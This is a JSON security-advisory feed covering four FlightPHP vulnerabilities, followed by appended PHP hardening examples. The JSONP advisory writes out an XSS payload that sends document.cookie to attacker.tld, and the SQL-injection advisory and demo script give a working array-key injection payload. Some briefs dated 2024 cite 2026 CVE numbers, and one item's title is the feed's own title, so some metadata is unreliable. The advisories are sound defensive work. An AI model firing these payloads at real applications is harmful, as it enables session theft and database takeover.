{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/products/flightphp/core--3.18.1/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["flightphp/core (\u003c 3.18.1)"],"_cs_severities":["high"],"_cs_tags":["csrf","middleware-bypass","cache-poisoning","http-method-override"],"_cs_type":"advisory","_cs_vendors":["composer"],"content_html":"\u003cp\u003eFlightPHP versions prior to 3.18.1 honor HTTP method overrides unconditionally. The flaw resides in the \u003ccode\u003eRequest::getMethod()\u003c/code\u003e function within \u003ccode\u003eflight/net/Request.php\u003c/code\u003e, which applies the \u003ccode\u003eX-HTTP-Method-Override\u003c/code\u003e header and the \u003ccode\u003e$_REQUEST['_method']\u003c/code\u003e parameter regardless of the real request method, including safe verbs such as GET. Because \u003ccode\u003e$_REQUEST\u003c/code\u003e also merges query-string parameters, a plain link such as \u003ccode\u003e/?_method=DELETE\u003c/code\u003e is enough to turn a GET into a DELETE. An attacker can therefore change the method that routing and middleware see, leading to Cross-Site Request Forgery (CSRF) escalation, bypass of authentication and rate-limiting middleware keyed on the HTTP method, and CDN cache poisoning. The vulnerability was discovered by @Rootingg and patched in version 3.18.1 (commit b8dd23a) by introducing the \u003ccode\u003eflight.allow_method_override\u003c/code\u003e setting. 
Disabling this setting mitigates the vulnerability by ignoring method overrides entirely.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a FlightPHP application using a version prior to 3.18.1.\u003c/li\u003e\n\u003cli\u003eThe attacker locates an endpoint that performs a sensitive action using an unsafe HTTP method (e.g., DELETE, PUT).\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a GET request to that endpoint carrying either the \u003ccode\u003e_method\u003c/code\u003e parameter (e.g., \u003ccode\u003e/?_method=DELETE\u003c/code\u003e) or the \u003ccode\u003eX-HTTP-Method-Override\u003c/code\u003e header.\u003c/li\u003e\n\u003cli\u003eFor CSRF, the attacker embeds the \u003ccode\u003e_method\u003c/code\u003e URL in an HTML \u003ccode\u003e\u0026lt;img\u0026gt;\u003c/code\u003e tag on a website they control. Only the parameter variant works here: a browser does not attach a custom \u003ccode\u003eX-HTTP-Method-Override\u003c/code\u003e header to an image or link request, so the header variant is limited to requests the attacker sends directly.\u003c/li\u003e\n\u003cli\u003eA victim visits the attacker\u0026rsquo;s website, and their browser automatically sends the GET request to the vulnerable application, attaching the victim\u0026rsquo;s session cookies.\u003c/li\u003e\n\u003cli\u003eThe FlightPHP application treats the GET request as the specified unsafe method (e.g., DELETE) because of the \u003ccode\u003e_method\u003c/code\u003e parameter.\u003c/li\u003e\n\u003cli\u003eThe application executes the sensitive action (e.g., deleting a resource) under the victim\u0026rsquo;s session. CSRF protections that are applied only to state-changing verbs are never consulted, because the request arrived as a GET.\u003c/li\u003e\n\u003cli\u003eAlternatively, if middleware checks the HTTP method to decide whether to apply controls such as authentication or rate limiting, the attacker bypasses it by sending a GET request with a forged \u003ccode\u003e_method\u003c/code\u003e parameter or \u003ccode\u003eX-HTTP-Method-Override\u003c/code\u003e header.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability can have several significant impacts. 
It allows attackers to perform CSRF attacks, potentially leading to unauthorized data modification or deletion. Attackers can bypass security middleware that relies on HTTP method verification, gaining unauthorized access to protected resources. The vulnerability also enables CDN cache poisoning: a CDN that caches GET responses by URL may store the response of a request the origin actually processed as a DELETE or PUT, and serve that content to other users. Any application running a vulnerable version is exposed; the number of affected deployments is unknown.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade FlightPHP to version 3.18.1 or later to patch CVE-2026-42551.\u003c/li\u003e\n\u003cli\u003eSet the \u003ccode\u003eflight.allow_method_override\u003c/code\u003e setting to \u003ccode\u003efalse\u003c/code\u003e to disable HTTP method overriding as described in the advisory. If the application relies on overrides for HTML forms, accept them only on POST requests and only from the request body, never from the query string.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect FlightPHP HTTP Method Override via _method Parameter\u003c/code\u003e to detect exploitation attempts using the \u003ccode\u003e_method\u003c/code\u003e parameter.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect FlightPHP HTTP Method Override via X-HTTP-Method-Override Header\u003c/code\u003e to detect exploitation attempts using the \u003ccode\u003eX-HTTP-Method-Override\u003c/code\u003e header.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-26T12:00:00Z","date_published":"2024-01-26T12:00:00Z","id":"/briefs/2024-01-26-flightphp-http-override/","summary":"A vulnerability in FlightPHP core versions before 3.18.1 allows attackers to override HTTP methods via the `X-HTTP-Method-Override` header or `_method` parameter, leading to CSRF escalation, middleware bypass, and cache poisoning.","title":"FlightPHP HTTP Method Override Vulnerability Leads to CSRF and Middleware 
Bypass","url":"https://feed.craftedsignal.io/briefs/2024-01-26-flightphp-http-override/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["flightphp/core (\u003c 3.18.1)"],"_cs_severities":["high"],"_cs_tags":["reflected-xss","web-application","php"],"_cs_type":"advisory","_cs_vendors":["Composer"],"content_html":"\u003cp\u003eFlightPHP versions prior to 3.18.1 are vulnerable to reflected cross-site scripting (XSS) due to insufficient validation of the \u003ccode\u003ejsonp\u003c/code\u003e query parameter within the \u003ccode\u003eFlight::jsonp()\u003c/code\u003e function. This function, intended for JSONP responses, concatenates the \u003ccode\u003ejsonp\u003c/code\u003e parameter directly into the \u003ccode\u003eapplication/javascript\u003c/code\u003e response body without ensuring it is a valid JavaScript identifier, so the callback position can carry arbitrary JavaScript statements instead of a function name. The injected code runs wherever the response is executed as a script. When an attacker-controlled page loads the endpoint through a \u003ccode\u003e\u0026lt;script\u0026gt;\u003c/code\u003e tag, the browser sends the victim\u0026rsquo;s session cookies with the request (subject to their \u003ccode\u003eSameSite\u003c/code\u003e attribute) and executes the response in the attacker page\u0026rsquo;s origin, so the injected code receives the victim\u0026rsquo;s authenticated API response but sees the attacker origin\u0026rsquo;s \u003ccode\u003edocument.cookie\u003c/code\u003e, not the victim\u0026rsquo;s. Executing the payload inside the victim origin requires the response to be run there, for example by a same-origin page that includes the endpoint with a user-influenced callback. The vulnerability was discovered by @Rootingg and patched in version 3.18.1, commit \u003ccode\u003eb8dd23a\u003c/code\u003e, by validating the callback name against the regex \u003ccode\u003e^[A-Za-z_$][\\w$.]{0,127}$\u003c/code\u003e.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker identifies an application using FlightPHP versions prior to 3.18.1.\u003c/li\u003e\n\u003cli\u003eThe attacker locates a route that calls the vulnerable \u003ccode\u003eFlight::jsonp()\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious URL containing a \u003ccode\u003ejsonp\u003c/code\u003e parameter with an XSS payload. 
Example: \u003ccode\u003e/api?jsonp=;window.xss=function(d){fetch('https://attacker.tld/c='+d)};xss(document.cookie);//\u003c/code\u003e. The leading \u003ccode\u003e;\u003c/code\u003e starts a fresh statement and the trailing \u003ccode\u003e//\u003c/code\u003e comments out the wrapped data, so this particular payload discards the API response; a payload that wants that response keeps a callback in place and forwards its argument.\u003c/li\u003e\n\u003cli\u003eThe attacker hosts a page containing a \u003ccode\u003e\u0026lt;script\u0026gt;\u003c/code\u003e tag that points to the vulnerable endpoint on the victim\u0026rsquo;s domain, using the crafted malicious URL.\u003c/li\u003e\n\u003cli\u003eA user visits the attacker-controlled page in a browser.\u003c/li\u003e\n\u003cli\u003eThe browser fetches the endpoint with the user\u0026rsquo;s cookies and executes the response, including the injected JavaScript, in the attacker page\u0026rsquo;s origin; the JSONP data (the user\u0026rsquo;s authenticated API response) is handed to whatever callback expression the attacker supplied.\u003c/li\u003e\n\u003cli\u003eThe injected JavaScript collects what it can reach: the authenticated API response in the cross-origin case, and cookies or session tokens where the response executes inside the victim origin.\u003c/li\u003e\n\u003cli\u003eThe stolen data is exfiltrated to a domain controlled by the attacker (e.g., \u003ccode\u003eattacker.tld\u003c/code\u003e).\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this XSS vulnerability can lead to significant consequences. Attackers can exfiltrate authenticated API responses and, where the injected code runs inside the victim origin, steal user cookies and hijack user sessions. This impacts any application using the vulnerable \u003ccode\u003eFlight::jsonp()\u003c/code\u003e function. The number of potential victims depends on the popularity and usage of applications built with the affected FlightPHP versions. 
In the worst case, attackers can impersonate users, access sensitive data, and potentially compromise the entire application.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade FlightPHP to version 3.18.1 or later to incorporate the patch that validates the callback name.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect FlightPHP JSONP XSS Attempt\u003c/code\u003e to your SIEM to detect potential exploitation attempts by monitoring for specific patterns in web server logs.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for requests whose \u003ccode\u003ejsonp\u003c/code\u003e query parameter contains anything outside the identifier pattern above (semicolons, parentheses, braces, quotes, or \u003ccode\u003e//\u003c/code\u003e), as in the example URL in the Attack Chain.\u003c/li\u003e\n\u003cli\u003eImplement strict input validation on all query parameters, especially those used in dynamic content generation, and prefer CORS over JSONP for cross-origin API access, since JSONP by design executes the response as script.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-24T12:00:00Z","date_published":"2024-01-24T12:00:00Z","id":"/briefs/2024-01-24-flightphp-xss/","summary":"A reflected XSS vulnerability exists in FlightPHP versions prior to 3.18.1 due to improper validation of the jsonp query parameter in the Flight::jsonp() function, allowing attackers to inject arbitrary JavaScript into the script response, exposing authenticated API responses and, where the payload executes inside the victim origin, cookies and sessions.","title":"FlightPHP Reflected XSS Vulnerability in jsonp()","url":"https://feed.craftedsignal.io/briefs/2024-01-24-flightphp-xss/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["flightphp/core (\u003c 3.18.1)"],"_cs_severities":["high"],"_cs_tags":["information-disclosure","web-application","flightphp"],"_cs_type":"advisory","_cs_vendors":["composer"],"content_html":"\u003cp\u003eThe FlightPHP framework, prior to version 3.18.1, is vulnerable to sensitive information disclosure due to its default error handling mechanism. 
The \u003ccode\u003eEngine::_error()\u003c/code\u003e function writes the full exception message, exception code, and stack trace directly into the HTTP 500 response without any debug gating. This exposes internal filesystem paths, secrets interpolated into exception messages (such as database credentials or API tokens), and the application\u0026rsquo;s module structure. Note that a PHP stack trace also lists function arguments unless \u003ccode\u003ezend.exception_ignore_args\u003c/code\u003e is enabled, so a password passed to a database constructor can appear in the trace even when no exception message mentions it. The vulnerability was discovered by @Rootingg and a proof of concept is available, demonstrating the leakage of sensitive information. The disclosed paths and structure give attackers useful primitives for chaining other weaknesses, such as Local File Inclusion (LFI) or path traversal, which need exact on-disk locations. The issue is resolved in version 3.18.1 with the introduction of a \u003ccode\u003eflight.debug\u003c/code\u003e setting that gates the verbose output.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker identifies a FlightPHP application running a version prior to 3.18.1.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a request designed to trigger an uncaught exception within the application. 
This could be through invalid input, resource exhaustion, or other error-inducing actions.\u003c/li\u003e\n\u003cli\u003eThe application\u0026rsquo;s error handler, \u003ccode\u003eEngine::_error()\u003c/code\u003e, is invoked.\u003c/li\u003e\n\u003cli\u003eThe error handler formats the exception message, code, and stack trace into an HTML response.\u003c/li\u003e\n\u003cli\u003eThis response includes absolute filesystem paths, revealing the application\u0026rsquo;s directory structure.\u003c/li\u003e\n\u003cli\u003eThe response may also include secrets, such as database credentials or API keys, if these appear in exception messages or in the arguments recorded in the stack trace.\u003c/li\u003e\n\u003cli\u003eThe HTTP 500 response is sent to the attacker\u0026rsquo;s client, containing the sensitive information.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the disclosed information to further exploit the application, for example by supplying exact paths to an LFI or path traversal weakness, or by using leaked credentials directly.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability can lead to the disclosure of sensitive information, including absolute filesystem paths, database credentials, API tokens, and internal application structure. This information can be used to facilitate further attacks, such as Local File Inclusion (LFI) or path traversal. The disclosure of database credentials or API tokens could grant attackers unauthorized access to sensitive data or systems. The vulnerability affects applications using FlightPHP versions prior to 3.18.1.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade FlightPHP to version 3.18.1 or later to patch the vulnerability. 
The fix introduces a \u003ccode\u003eflight.debug\u003c/code\u003e setting that gates the verbose output, preventing sensitive information from being exposed in production environments; leave it disabled in production.\u003c/li\u003e\n\u003cli\u003eKeep PHP\u0026rsquo;s own \u003ccode\u003edisplay_errors\u003c/code\u003e off and \u003ccode\u003ezend.exception_ignore_args\u003c/code\u003e on in production: errors raised outside the framework handler are not covered by \u003ccode\u003eflight.debug\u003c/code\u003e, and a trace recorded without arguments cannot leak a constructor\u0026rsquo;s password.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;FlightPHP Sensitive Information Disclosure in HTTP Response\u0026rdquo; to detect instances of verbose error messages in HTTP 500 responses.\u003c/li\u003e\n\u003cli\u003eReview application code to ensure that sensitive information, such as database credentials and API tokens, is not interpolated into exception messages.\u003c/li\u003e\n\u003cli\u003eMake sure web server access logs are collected (the Sigma rule\u0026rsquo;s logsource is the \u003ccode\u003ewebserver\u003c/code\u003e category on Linux or Windows hosts) so that HTTP 500 responses and the requests that triggered them can be correlated.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-08T12:00:00Z","date_published":"2024-01-08T12:00:00Z","id":"/briefs/2024-01-flightphp-info-disclosure/","summary":"The default error handler in FlightPHP core writes the full exception message, exception code, and stack trace directly into the HTTP 500 response, disclosing sensitive information such as internal paths, secrets, and application structure.","title":"FlightPHP Sensitive Information Disclosure via Default Error Handler","url":"https://feed.craftedsignal.io/briefs/2024-01-flightphp-info-disclosure/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["flightphp/core (\u003c 3.18.1)"],"_cs_severities":["high"],"_cs_tags":["sql-injection","web-application","vulnerability"],"_cs_type":"advisory","_cs_vendors":["composer"],"content_html":"\u003cp\u003eThe Flight framework, specifically versions prior to 3.18.1, contains an SQL injection vulnerability in the \u003ccode\u003eSimplePdo\u003c/code\u003e class. 
The \u003ccode\u003einsert()\u003c/code\u003e, \u003ccode\u003eupdate()\u003c/code\u003e, and \u003ccode\u003edelete()\u003c/code\u003e methods build SQL statements by concatenating the \u003ccode\u003e$table\u003c/code\u003e argument and the keys of the \u003ccode\u003e$data\u003c/code\u003e array directly into the query string, with no identifier quoting or validation; only the array values are bound as parameters. An attacker can therefore inject arbitrary SQL through the array keys whenever user-controlled data is forwarded to these helpers as-is (e.g., \u003ccode\u003e$db-\u0026gt;insert('users', $request-\u0026gt;data-\u0026gt;getData())\u003c/code\u003e). Discovered by @Rootingg, this vulnerability was addressed in commit b8dd23a and assigned CVE-2026-42550. Exploitation can lead to privilege escalation, arbitrary data modification, and complete data exfiltration.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies an application endpoint that uses the Flight framework and its database interaction methods (insert, update, delete).\u003c/li\u003e\n\u003cli\u003eThe application uses \u003ccode\u003eSimplePdo::insert()\u003c/code\u003e, \u003ccode\u003eSimplePdo::update()\u003c/code\u003e, or \u003ccode\u003eSimplePdo::delete()\u003c/code\u003e with user-supplied data. 
For example: \u003ccode\u003e$db-\u0026gt;insert('users', $request-\u0026gt;data-\u0026gt;getData());\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious JSON payload with SQL injection in the array keys, such as \u003ccode\u003e{\u0026quot;name, is_admin) VALUES (?, 1);-- \u0026quot;: \u0026quot;attacker_injected\u0026quot;}\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker sends the crafted JSON payload to the vulnerable endpoint via an HTTP POST request.\u003c/li\u003e\n\u003cli\u003eThe application decodes the JSON into an associative array and passes it to the vulnerable \u003ccode\u003eSimplePdo\u003c/code\u003e method.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eSimplePdo\u003c/code\u003e method concatenates the malicious array key directly into the SQL text, producing \u003ccode\u003eINSERT INTO users (name, is_admin) VALUES (?, 1);-- ) VALUES (?)\u003c/code\u003e. The comment swallows the helper\u0026rsquo;s own closing parenthesis and placeholder, and the single remaining placeholder is bound to the attacker\u0026rsquo;s value.\u003c/li\u003e\n\u003cli\u003eThe database executes the injected statement, leading to unintended modifications, such as the creation of an administrative account or modification of existing data.\u003c/li\u003e\n\u003cli\u003eThe attacker escalates privileges, exfiltrates data, or causes data destruction depending on the nature of the injected SQL.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this SQL injection vulnerability can lead to severe consequences, including unauthorized privilege escalation, allowing attackers to gain administrative control over the application. Attackers can also arbitrarily modify database columns, leading to data corruption or manipulation. Furthermore, data destruction and exfiltration are possible through the use of the \u003ccode\u003e$where\u003c/code\u003e parameter, potentially resulting in complete data loss or exposure of sensitive information. 
This vulnerability affects applications using Flight framework versions prior to 3.18.1.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade to Flight framework version 3.18.1 or later, which includes the fix for CVE-2026-42550 with the \u003ccode\u003erequireSafeIdentifier()\u003c/code\u003e helper function.\u003c/li\u003e\n\u003cli\u003eNever derive table or column names from request data, even after upgrading: map request fields onto an explicit allow-list of columns before calling these helpers. Identifier validation stops the injection, but passing \u003ccode\u003e$request-\u0026gt;data-\u0026gt;getData()\u003c/code\u003e straight through still lets a client choose which columns to write (for example \u003ccode\u003eis_admin\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Flight Framework SQL Injection Attempt via Malicious Array Keys\u0026rdquo; to identify potential exploitation attempts by monitoring for suspicious patterns in HTTP request bodies and application logs.\u003c/li\u003e\n\u003cli\u003eReview and audit all existing code that uses \u003ccode\u003eSimplePdo::insert()\u003c/code\u003e, \u003ccode\u003eSimplePdo::update()\u003c/code\u003e, and \u003ccode\u003eSimplePdo::delete()\u003c/code\u003e to confirm that table names, column names, and \u003ccode\u003e$where\u003c/code\u003e clauses come only from application code.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-03-flight-sqli/","summary":"Flight framework is vulnerable to SQL Injection; an attacker can inject arbitrary SQL by crafting malicious array keys due to SimplePdo::insert(), SimplePdo::update(), and SimplePdo::delete() building SQL statements by concatenating the $table argument and the keys of the $data array directly into the query, with no identifier quoting or validation, leading to privilege escalation, arbitrary column writes, data destruction, and exfiltration.","title":"CraftedSignal Threat Feed — Flightphp/Core (\u003c 
3.18.1)","version":"https://jsonfeed.org/version/1.1"}
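As an added example that is not part of this feed and not FlightPHP's own code, the PHP script below shows the two request-side checks that the method-override and `jsonp()` advisories above call for: honouring `_method` / `X-HTTP-Method-Override` only on POST requests and only from the request body, and validating the JSONP callback against the regex the `jsonp()` advisory quotes. The function names, the `$allowOverride` flag standing in for `flight.allow_method_override`, and the request arrays and callback strings are all constructed for this example.

```php
<?php
// Added example, not FlightPHP code: the two request-side checks that the method
// override and jsonp() advisories describe, as stand-alone functions fed
// constructed request data so the file runs from the CLI (php example.php).
declare(strict_types=1);

// Callback pattern quoted in the jsonp() advisory.
const JSONP_CALLBACK_RE = '/^[A-Za-z_$][\w$.]{0,127}$/';

// Resolve the effective HTTP method. $allowOverride stands in for the
// flight.allow_method_override setting. Overrides are honoured only on POST and
// only from the body: HTML forms (the one legitimate user of overrides) can send
// nothing but GET and POST, and reading $_REQUEST would let a query-string
// ?_method=DELETE inside an <img> or link rewrite a GET.
function effectiveMethod(array $server, array $post, bool $allowOverride): string
{
    $method = strtoupper($server['REQUEST_METHOD'] ?? 'GET');
    if (!$allowOverride || $method !== 'POST') {
        return $method;
    }
    $override = $server['HTTP_X_HTTP_METHOD_OVERRIDE'] ?? $post['_method'] ?? null;
    if (!is_string($override)) {
        return $method;
    }
    $override = strtoupper($override);
    // Allow only the verbs a form cannot express; never downgrade to GET/HEAD.
    return in_array($override, ['PUT', 'PATCH', 'DELETE'], true) ? $override : $method;
}

// Build a JSONP body, refusing any callback that is not a plain identifier path.
// Returns null when the callback is rejected; the caller should answer HTTP 400.
function jsonpBody(string $callback, array $data): ?string
{
    if (preg_match(JSONP_CALLBACK_RE, $callback) !== 1) {
        return null;
    }
    return $callback . '(' . json_encode($data, JSON_THROW_ON_ERROR) . ');';
}

// Constructed requests (not captured traffic): [verb, extra $_SERVER keys, $_POST, allowOverride].
$cases = [
    ['GET',  [], ['_method' => 'DELETE'], true],                          // CSRF-via-<img> case: stays GET
    ['GET',  ['HTTP_X_HTTP_METHOD_OVERRIDE' => 'DELETE'], [], true],      // direct header case: stays GET
    ['POST', [], ['_method' => 'delete'], true],                          // legitimate form override: DELETE
    ['POST', [], ['_method' => 'delete'], false],                         // overrides disabled: stays POST
];
foreach ($cases as [$verb, $headers, $post, $allow]) {
    $server = ['REQUEST_METHOD' => $verb] + $headers;
    printf("%-4s allow=%-5s -> %s\n", $verb, var_export($allow, true), effectiveMethod($server, $post, $allow));
}

$payloads = [
    'handleUsers',                                  // accepted
    'app.callbacks.onUsers',                        // accepted: dotted path is allowed
    ';window.xss=function(d){fetch(\'https://attacker.tld/c=\'+d)};xss(document.cookie);//', // rejected
    str_repeat('a', 129),                           // rejected: longer than 128 characters
];
foreach ($payloads as $cb) {
    $body = jsonpBody($cb, ['ok' => true]);
    printf("%-24s -> %s\n", substr($cb, 0, 24), $body === null ? 'HTTP 400 (callback rejected)' : $body);
}
```

The header is given precedence over the body field only because both are read from the same POST; with `$allowOverride` false neither is consulted, which is the behaviour the `flight.allow_method_override=false` recommendation produces.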
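The error-handler advisory above describes a 500 page that prints the exception and its trace unconditionally. The script below is an added example, not FlightPHP code, of the debug-gated alternative that a `flight.debug`-style flag enables: full detail goes to a log with a reference id, and the client sees the detail only when `$debug` is true. `renderError()`, `connect()`, the DSN and the password are hypothetical and constructed for the example; whether the password actually shows up in the trace depends on the `zend.exception_ignore_args` ini setting, which the comments explain.

```php
<?php
// Added example, not FlightPHP code: a debug-gated 500 renderer of the kind the
// error-handler advisory's flight.debug setting introduces, exercised with a
// constructed exception whose stack trace carries a secret as an argument.
declare(strict_types=1);

// Returns [status, html body]. The full detail always goes to $log; it reaches
// the client only when $debug is true. The reference id lets support correlate
// a user's report with the server-side log line.
function renderError(Throwable $e, bool $debug, callable $log): array
{
    $ref = bin2hex(random_bytes(8));
    $detail = sprintf("%s: %s (code %s) in %s:%d\n%s",
        get_class($e), $e->getMessage(), $e->getCode(), $e->getFile(), $e->getLine(), $e->getTraceAsString());
    $log("[$ref] $detail");

    $body = '<h1>500 Internal Server Error</h1>';
    if ($debug) {
        $body .= '<pre>' . htmlspecialchars($detail, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</pre>';
    } else {
        $body .= '<p>Reference: ' . $ref . '</p>';
    }
    return [500, $body];
}

// Hypothetical connect helper that fails. The password is a plain argument, so
// it is recorded in the trace unless zend.exception_ignore_args=On (the
// php.ini-production default; the built-in default is Off, so a bare CLI run
// typically shows it in the debug output below).
function connect(string $dsn, string $password): void
{
    throw new RuntimeException("SQLSTATE[HY000] [1045] Access denied for user 'app'@'db'", 1045);
}

$logged = [];
$log = static function (string $line) use (&$logged): void { $logged[] = $line; };

try {
    connect('mysql:host=db;dbname=shop', 'Sup3rS3cret');
} catch (Throwable $e) {
    foreach ([true, false] as $debug) {
        [$status, $body] = renderError($e, $debug, $log);
        printf("debug=%-5s status=%d password in response: %s\n",
            var_export($debug, true), $status, str_contains($body, 'Sup3rS3cret') ? 'yes' : 'no');
    }
}
// The secret may still be in the server-side log: treat the log itself as sensitive.
printf("log lines: %d, password in log: %s\n", count($logged), str_contains($logged[0], 'Sup3rS3cret') ? 'yes' : 'no');
```

With `debug=false` the body never contains the password regardless of the ini setting; with `debug=true` it does whenever arguments are recorded, which is exactly the production exposure the advisory describes.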
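For the `SimplePdo` advisory above, the following added example (not FlightPHP's code) places a minimal `insert()` helper built the way the advisory describes, with the table name and `$data` keys concatenated into the SQL, next to a hardened variant that validates and quotes every identifier first. `requireSafeIdentifier()` here is my own stand-in for the helper the advisory names; its pattern (letters, digits, underscore, at most 64 characters) is an assumption, not the upstream regex. The malicious key is the advisory's own payload. The script needs only `ext/pdo_sqlite` and runs against an in-memory database.

```php
<?php
// Added example, not FlightPHP code: an INSERT helper built the way the advisory
// describes SimplePdo::insert() (table and $data keys concatenated into the SQL),
// beside a hardened variant that validates identifiers before concatenation.
// Runs against an in-memory SQLite database, so it needs only ext/pdo_sqlite.
declare(strict_types=1);

final class UnsafeIdentifier extends InvalidArgumentException {}

// Stand-in for the requireSafeIdentifier() helper the advisory mentions. The
// pattern is an assumption: letters, digits, underscore, max 64 chars (MySQL's
// identifier limit). Anything else, including spaces and punctuation, is rejected.
function requireSafeIdentifier(string $name): string
{
    if (preg_match('/^[A-Za-z_][A-Za-z0-9_]{0,63}$/', $name) !== 1) {
        throw new UnsafeIdentifier('unsafe SQL identifier: ' . var_export($name, true));
    }
    return $name;
}

// Vulnerable pattern: keys go straight into the statement; only values are bound.
function insertVulnerable(PDO $db, string $table, array $data): void
{
    $cols  = implode(', ', array_keys($data));
    $marks = implode(', ', array_fill(0, count($data), '?'));
    $sql   = "INSERT INTO $table ($cols) VALUES ($marks)";
    $db->prepare($sql)->execute(array_values($data));
}

// Hardened pattern: every identifier is validated and quoted before it is
// concatenated; values are still bound as parameters. Double-quoted identifiers
// are SQL standard and work in SQLite/PostgreSQL; MySQL needs backticks or ANSI_QUOTES.
function insertHardened(PDO $db, string $table, array $data): void
{
    $table = requireSafeIdentifier($table);
    $cols = [];
    foreach (array_keys($data) as $col) {
        $cols[] = '"' . requireSafeIdentifier((string) $col) . '"';
    }
    $marks = implode(', ', array_fill(0, count($data), '?'));
    $sql = sprintf('INSERT INTO "%s" (%s) VALUES (%s)', $table, implode(', ', $cols), $marks);
    $db->prepare($sql)->execute(array_values($data));
}

$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT NOT NULL, is_admin INTEGER NOT NULL DEFAULT 0)');

// Constructed attacker body: the advisory's JSON payload as json_decode(..., true) would return it.
$payload = ['name, is_admin) VALUES (?, 1);-- ' => 'attacker_injected'];

// SQLite compiles only the first statement, so the text after ";--" is ignored
// and the one remaining placeholder is bound to the attacker's value.
insertVulnerable($db, 'users', $payload);
$row = $db->query("SELECT name, is_admin FROM users WHERE name = 'attacker_injected'")->fetch(PDO::FETCH_ASSOC);
printf("vulnerable helper: name=%s is_admin=%d\n", $row['name'], $row['is_admin']); // is_admin=1

try {
    insertHardened($db, 'users', $payload);
} catch (UnsafeIdentifier $e) {
    echo "hardened helper: rejected -> ", $e->getMessage(), "\n";
}
insertHardened($db, 'users', ['name' => 'alice']); // a legitimate call still works
printf("rows in users: %d\n", $db->query('SELECT COUNT(*) FROM users')->fetchColumn()); // 2
```

Note that the hardened helper only stops injection: if the application still passes the decoded request body through unchanged, a client can legitimately name `is_admin` as a column, which is why the recommendation above also asks for an explicit column allow-list.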